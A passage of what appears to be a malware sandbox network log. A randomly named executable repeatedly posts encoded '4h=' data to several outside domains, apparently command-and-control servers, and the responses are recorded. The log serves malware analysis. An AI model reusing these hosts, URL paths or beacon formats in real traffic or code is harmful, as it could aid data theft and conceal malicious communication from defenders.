                                  Data Ascii: 4h=bfZ8JyO872QvWQ+E3Pj6j2ZnjYvM8AnJ7K9TcKkbW7joDXiKnMCL4m6q6DM5hgaW6Y8Cbj/EQyOh/PBe5WDjW/D/CIVJNCUIG9VqWWPFehFLGoTEpvOqTYY9fO4h5xX4mEMn1flJIMTaxRrC/8Xb/ttCDru6xfRv5bvFecIlDUG35sobmESdbnVHxisBcJg79RPkYcMmYl9yMs0pOQ==
                                  May 27, 2024 12:34:38.124923944 CEST | 805 | IN | HTTP/1.1 404 Not Found
                                  Date: Mon, 27 May 2024 10:34:38 GMT
                                  Content-Type: text/html; charset=iso-8859-1
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZFfBmjngeefoQXmwhIwusgCfJraR3M1FEcCdHCY%2Bs1IxfHaFkXcmyw6o3YuwCh0hr6B2e1mOClgnTbI90mkg5mRJatLAIlE3hnIMP%2BDXHRbMeT3u%2Bv6QJJMiTZgQRMSXvkw%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 88a55a827f2ac33d-EWR
                                  Content-Encoding: gzip
                                  alt-svc: h3=":443"; ma=86400


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  6 | 192.168.2.7 | 49717 | 104.21.81.245 | 80 | 6704 | C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  May 27, 2024 12:34:39.961582899 CEST | 765 | OUT | POST /jcz4/ HTTP/1.1
                                  Host: www.lets-goo.ru
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Accept-Encoding: gzip, deflate, br
                                  Origin: http://www.lets-goo.ru
                                  Connection: close
                                  Content-Length: 235
                                  Content-Type: application/x-www-form-urlencoded
                                  Cache-Control: max-age=0
                                  Referer: http://www.lets-goo.ru/jcz4/
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  Data Ascii: 4h=bfZ8JyO872QvWwuEk8L6r2Zgs4vMzgmO7KhTcPU1WJHoDzuKmIuL7m6q1jMwiQbY6YwKbmHEQyKh/Oxe4lbgXvD9EIVLJCUIG9VqWVzveghLHYDE7OOle4YiYO4hzRX8mENI1dBzIJXaxTzC+tXYxtt+dbvihPcQ8eHrZ8Y7J3KU8a158mexF2t81gI3Lv9O/QL8V+4HHSYYB+VtYi28un3FJi/K8Rj7BzycgXo=
                                  May 27, 2024 12:34:40.656408072 CEST | 804 | IN | HTTP/1.1 404 Not Found
                                  Date: Mon, 27 May 2024 10:34:40 GMT
                                  Content-Type: text/html; charset=iso-8859-1
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w40qH%2BXGSRJfiJagOpcaw3Usw%2BBQTZ%2FMBbIIc3J11902iE8ey2YXzrrs4HDU5Fro%2BFq5yxiVNJqPsApT8o2kC9%2BqqxBI5E8XSdypPzK8Bt3a7DA2SNKkl9yghmXx4qpK15I%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 88a55a9249ca4234-EWR
                                  Content-Encoding: gzip
                                  alt-svc: h3=":443"; ma=86400


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  7 | 192.168.2.7 | 49718 | 104.21.81.245 | 80 | 6704 | C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  May 27, 2024 12:34:42.560177088 CEST | 1778 | OUT | POST /jcz4/ HTTP/1.1
                                  Host: www.lets-goo.ru
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Accept-Encoding: gzip, deflate, br
                                  Origin: http://www.lets-goo.ru
                                  Connection: close
                                  Content-Length: 1247
                                  Content-Type: application/x-www-form-urlencoded
                                  Cache-Control: max-age=0
                                  Referer: http://www.lets-goo.ru/jcz4/
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  May 27, 2024 12:34:43.261194944 CEST | 804 | IN | HTTP/1.1 404 Not Found
                                  Date: Mon, 27 May 2024 10:34:43 GMT
                                  Content-Type: text/html; charset=iso-8859-1
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O84MJQ%2BCfOwHgoOw6VvBemqh7w0bDrwdaNPU%2BGnnQ1Ry2g55xtgUeLo4xfsOCR8xioY%2FDPewGnr7of2s46kOKXA%2FoQUR2O0GrSCvYMhyH4%2BkrfKBqpbL9GvCpW5kTl7oXSw%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 88a55aa29a62437b-EWR
                                  Content-Encoding: gzip
                                  alt-svc: h3=":443"; ma=86400


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  8 | 192.168.2.7 | 49719 | 104.21.81.245 | 80 | 6704 | C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  May 27, 2024 12:34:45.100387096 CEST | 486 | OUT | GET /jcz4/?4h=WdxcKFuQ7mYOQBn+p/nyxXlogtPhyiv1qK8yWbAPdcz8dy7KnvGu92vbpUccmm37j4MpRjiQV1qWt/RV+FnqAomjDZURMhccC9NzYUb/SGoQANKT0/qbRrolcopRkFHPlXwp4+ZNAZOj&623=YLI8v8eXd0Y HTTP/1.1
                                  Host: www.lets-goo.ru
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Connection: close
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  May 27, 2024 12:34:45.801269054 CEST | 799 | IN | HTTP/1.1 404 Not Found
                                  Date: Mon, 27 May 2024 10:34:45 GMT
                                  Content-Type: text/html; charset=iso-8859-1
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jOxdo5ZR4k7ZWkEDIh8ot9bqD6ouRWQ%2B7n%2BUZ%2FTfGKZrTQ9gp8hqkopfUzCIqKZr8RM0SsawC8DEKtzBJw8e%2FAyQq1tJQcoe%2FUTr4lLxp0ktkAZ1l9T41aV03QKbW%2BcPqg0%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 88a55ab26a100f4b-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  Data Ascii: c4<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>0


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  9 | 192.168.2.7 | 49720 | 69.57.162.24 | 80 | 6704 | C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  May 27, 2024 12:34:50.836232901 CEST | 775 | OUT | POST /o2z4/ HTTP/1.1
                                  Host: www.emgeecontracting.shop
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Accept-Encoding: gzip, deflate, br
                                  Origin: http://www.emgeecontracting.shop
                                  Connection: close
                                  Content-Length: 215
                                  Content-Type: application/x-www-form-urlencoded
                                  Cache-Control: max-age=0
                                  Referer: http://www.emgeecontracting.shop/o2z4/
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  Data Ascii: 4h=l6zNcs7vgAZHpKTO2NUTbLWQE+1K377tB9Q5NmlepZjJuQUR+YZ9gPB2Ggcu5B3LRkJ6pdGIWTBZVtkQSazhY2kQt9gxhrZBYDwYl42T5Ij3eHPLPhS9f4Dlc3doHDw3Gdb6r6cbfd8LVcv6MH27431Zi1xybD6gK0dKQ5BL+yn95Pz2vuiJUBCiYlf6uNnRSWhNNzjPG73n9W5yrQ==
                                  May 27, 2024 12:34:51.423408031 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                  keep-alive: timeout=5, max=100
                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                  pragma: no-cache
                                  content-type: text/html
                                  content-length: 1251
                                  date: Mon, 27 May 2024 10:34:51 GMT
                                  server: LiteSpeed
                                  x-turbo-charged-by: LiteSpeed
                                  connection: close
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-col
                                  May 27, 2024 12:34:51.423427105 CEST | 316 | IN
                                  Data Ascii: or:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such,


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  10 | 192.168.2.7 | 49721 | 69.57.162.24 | 80 | 6704 | C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  May 27, 2024 12:34:54.819845915 CEST | 795 | OUT | POST /o2z4/ HTTP/1.1
                                  Host: www.emgeecontracting.shop
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Accept-Encoding: gzip, deflate, br
                                  Origin: http://www.emgeecontracting.shop
                                  Connection: close
                                  Content-Length: 235
                                  Content-Type: application/x-www-form-urlencoded
                                  Cache-Control: max-age=0
                                  Referer: http://www.emgeecontracting.shop/o2z4/
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  Data Ascii: 4h=l6zNcs7vgAZHqpLO0uMTM7WPLe1Kir7pB9M5NngborHJvxIR/ZZ9lPB2eQcrkx3+Rk1ypd6IWSlZVoYQSpriZmkehdg/uLZBYDwYl4y15I73e0XLOD26VYDmMndoWzwzGdaXr4o1feILVcf6dza0y31bm1wZKxveMx1HZIBM4D/k1ZuU1MulKQ6Zcn7M5r6kQXlVARXuZMSNwEY29uJDEFH+3wN1jpWNR+c48AA=
                                  May 27, 2024 12:34:55.562805891 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                  keep-alive: timeout=5, max=100
                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                  pragma: no-cache
                                  content-type: text/html
                                  content-length: 1251
                                  date: Mon, 27 May 2024 10:34:55 GMT
                                  server: LiteSpeed
                                  x-turbo-charged-by: LiteSpeed
                                  connection: close
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-col
                                  May 27, 2024 12:34:55.562830925 CEST | 316 | IN |
                                  Data Ascii: or:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such,


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  11 | 192.168.2.7 | 49722 | 69.57.162.24 | 80 | 6704 | C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  May 27, 2024 12:34:57.350589037 CEST | 1808 | OUT | POST /o2z4/ HTTP/1.1
                                  Host: www.emgeecontracting.shop
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Accept-Encoding: gzip, deflate, br
                                  Origin: http://www.emgeecontracting.shop
                                  Connection: close
                                  Content-Length: 1247
                                  Content-Type: application/x-www-form-urlencoded
                                  Cache-Control: max-age=0
                                  Referer: http://www.emgeecontracting.shop/o2z4/
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  May 27, 2024 12:34:58.046570063 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                  keep-alive: timeout=5, max=100
                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                  pragma: no-cache
                                  content-type: text/html
                                  content-length: 1251
                                  date: Mon, 27 May 2024 10:34:57 GMT
                                  server: LiteSpeed
                                  x-turbo-charged-by: LiteSpeed
                                  connection: close
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-col
                                  May 27, 2024 12:34:58.046595097 CEST | 316 | IN |
                                  Data Ascii: or:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such,


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  12 | 192.168.2.7 | 49723 | 69.57.162.24 | 80 | 6704 | C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  May 27, 2024 12:34:59.883483887 CEST | 496 | OUT | GET /o2z4/?4h=o4btfdz60D114qnlpPkAL4ysHPNnnpnlNvMaE18djeqdyh8JxI4to+dkcTQv5jDwTFNUiMSIZUwmUqoSbZzkAVBLptEej4dkSw0Rp5qMw46dSxiTGxGYdrzYQnQsEiM3dvL1u5YQIt8O&623=YLI8v8eXd0Y HTTP/1.1
                                  Host: www.emgeecontracting.shop
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Connection: close
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  May 27, 2024 12:35:00.474288940 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                  keep-alive: timeout=5, max=100
                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                  pragma: no-cache
                                  content-type: text/html
                                  content-length: 1251
                                  date: Mon, 27 May 2024 10:35:00 GMT
                                  server: LiteSpeed
                                  x-turbo-charged-by: LiteSpeed
                                  connection: close
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-col
                                  May 27, 2024 12:35:00.474312067 CEST | 316 | IN |
                                  Data Ascii: or:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such,


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  13 | 192.168.2.7 | 49724 | 3.33.130.190 | 80 | 6704 | C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  May 27, 2024 12:35:05.507235050 CEST | 751 | OUT | POST /ff4v/ HTTP/1.1
                                  Host: www.duobao698.com
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Accept-Encoding: gzip, deflate, br
                                  Origin: http://www.duobao698.com
                                  Connection: close
                                  Content-Length: 215
                                  Content-Type: application/x-www-form-urlencoded
                                  Cache-Control: max-age=0
                                  Referer: http://www.duobao698.com/ff4v/
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  Data Ascii: 4h=GX3n87zUu0Xho0nlzrW8IrIIAC7FHWUdmhbjMPnvEu4aJ+59s/gjAx+NrzZy8QiHguXhWHDaqHRyP9wCXTUHCrOSKgE4KlrYQ+rhs1CkeCMZVU6WbWcataI102nIGyebg6yWLOhNi1mkAr04pLZFeVlxUG/wiuO5qsyZSeUwHgt5Y50OG1kFp1VcOR1pxicO8971fvrtnAawGb9J8g==


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  14 | 192.168.2.7 | 49725 | 3.33.130.190 | 80 | 6704 | C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  May 27, 2024 12:35:08.039880037 CEST | 771 | OUT | POST /ff4v/ HTTP/1.1
                                  Host: www.duobao698.com
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Accept-Encoding: gzip, deflate, br
                                  Origin: http://www.duobao698.com
                                  Connection: close
                                  Content-Length: 235
                                  Content-Type: application/x-www-form-urlencoded
                                  Cache-Control: max-age=0
                                  Referer: http://www.duobao698.com/ff4v/
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  Data Ascii: 4h=GX3n87zUu0XhpU7l2I+8KLIJNS7FJ2URmhXjMOSyEYgaJfJ9t6cjHx+NjTZ74Qi6guKcWH/aqHFyP/4CXA8EErOcMgE6AFrYQ+rhs1GCeC0ZUg+Wa3cdk6I0+WnICyfSg6zzLMEQizikAuQ4paZGEFl3K2+EhsjlgOrnW8ceOQN/dPpscXop3ktnKTRfmEB7+8/tSNfM43/aLJcNqd9o92xwi3cI3OBVEwXCb4Y=


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  15 | 192.168.2.7 | 49726 | 3.33.130.190 | 80 | 6704 | C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  May 27, 2024 12:35:10.588650942 CEST | 1784 | OUT | POST /ff4v/ HTTP/1.1
                                  Host: www.duobao698.com
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Accept-Encoding: gzip, deflate, br
                                  Origin: http://www.duobao698.com
                                  Connection: close
                                  Content-Length: 1247
                                  Content-Type: application/x-www-form-urlencoded
                                  Cache-Control: max-age=0
                                  Referer: http://www.duobao698.com/ff4v/
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  16 | 192.168.2.7 | 49727 | 3.33.130.190 | 80 | 6704 | C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  May 27, 2024 12:35:13.556117058 CEST | 488 | OUT | GET /ff4v/?4h=LVfH/OXwoF79o2r68Z//edB1CD2wHwJvvAzVR8ioN4kZT9t7ttcPOR+uxhJHzze41PCTSWmMujBUW/EaEzEZD5zZNBA7OVz8Vpr8h3iEYlpLT06Bb1IAlYNp8C2ydDS2jK3yMNhnhgns&623=YLI8v8eXd0Y HTTP/1.1
                                  Host: www.duobao698.com
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Connection: close
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  May 27, 2024 12:35:14.035862923 CEST | 414 | IN | HTTP/1.1 200 OK
                                  Server: openresty
                                  Date: Mon, 27 May 2024 10:35:13 GMT
                                  Content-Type: text/html
                                  Content-Length: 274
                                  Connection: close
                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?4h=LVfH/OXwoF79o2r68Z//edB1CD2wHwJvvAzVR8ioN4kZT9t7ttcPOR+uxhJHzze41PCTSWmMujBUW/EaEzEZD5zZNBA7OVz8Vpr8h3iEYlpLT06Bb1IAlYNp8C2ydDS2jK3yMNhnhgns&623=YLI8v8eXd0Y"}</script></head></html>


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  17 | 192.168.2.7 | 49728 | 199.59.243.225 | 80 | 6704 | C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  May 27, 2024 12:35:19.256022930 CEST | 769 | OUT | POST /61qh/ HTTP/1.1
                                  Host: www.drdavidglassman.com
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Accept-Encoding: gzip, deflate, br
                                  Origin: http://www.drdavidglassman.com
                                  Connection: close
                                  Content-Length: 215
                                  Content-Type: application/x-www-form-urlencoded
                                  Cache-Control: max-age=0
                                  Referer: http://www.drdavidglassman.com/61qh/
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  Data Ascii: 4h=6mAgDCmfBwgjJHmQsMq9vtYRjqiGVNocm5EpEj2XdQPpWL4NcXOVRnBhRGAwI/qAktSm/WP/kLdxRaXLHvQUEqoxGroiVXzqceEKLPxWXEd44d/Rz2HoDnSamgUMekxELN7LrXVx4dYOKNHr/8WrE5qyqn3gVC5oaNUVO6gQUZbT0og9Xv/VFUvUR88dcTKutU99itSDN6Ag0qdTgQ==
                                  May 27, 2024 12:35:19.724857092 CEST | 1236 | IN | HTTP/1.1 200 OK
                                  date: Mon, 27 May 2024 10:35:19 GMT
                                  content-type: text/html; charset=utf-8
                                  content-length: 1142
                                  x-request-id: c2bd879e-fe3b-47f1-9777-d06ee4b6cb26
                                  cache-control: no-store, max-age=0
                                  accept-ch: sec-ch-prefers-color-scheme
                                  critical-ch: sec-ch-prefers-color-scheme
                                  vary: sec-ch-prefers-color-scheme
                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_kKbi7a7KSvzC8ZHooZk47ntWva6e8enTx16ak6pdRIE34IpDw3TODTTx2bh+PJR6pL6B+NqnRMxHunbammF7KA==
                                  set-cookie: parking_session=c2bd879e-fe3b-47f1-9777-d06ee4b6cb26; expires=Mon, 27 May 2024 10:50:19 GMT; path=/
                                  connection: close
                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_kKbi7a7KSvzC8ZHooZk47ntWva6e8enTx16ak6pdRIE34IpDw3TODTTx2bh+PJR6pL6B+NqnRMxHunbammF7KA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                  May 27, 2024 12:35:19.724878073 CEST | 595 | IN |
                                  Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYzJiZDg3OWUtZmUzYi00N2YxLTk3NzctZDA2ZWU0YjZjYjI2IiwicGFnZV90aW1lIjoxNzE2ODA2MT


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  18 | 192.168.2.7 | 49729 | 199.59.243.225 | 80 | 6704 | C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  May 27, 2024 12:35:21.787390947 CEST | 789 | OUT | POST /61qh/ HTTP/1.1
                                  Host: www.drdavidglassman.com
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Accept-Encoding: gzip, deflate, br
                                  Origin: http://www.drdavidglassman.com
                                  Connection: close
                                  Content-Length: 235
                                  Content-Type: application/x-www-form-urlencoded
                                  Cache-Control: max-age=0
                                  Referer: http://www.drdavidglassman.com/61qh/
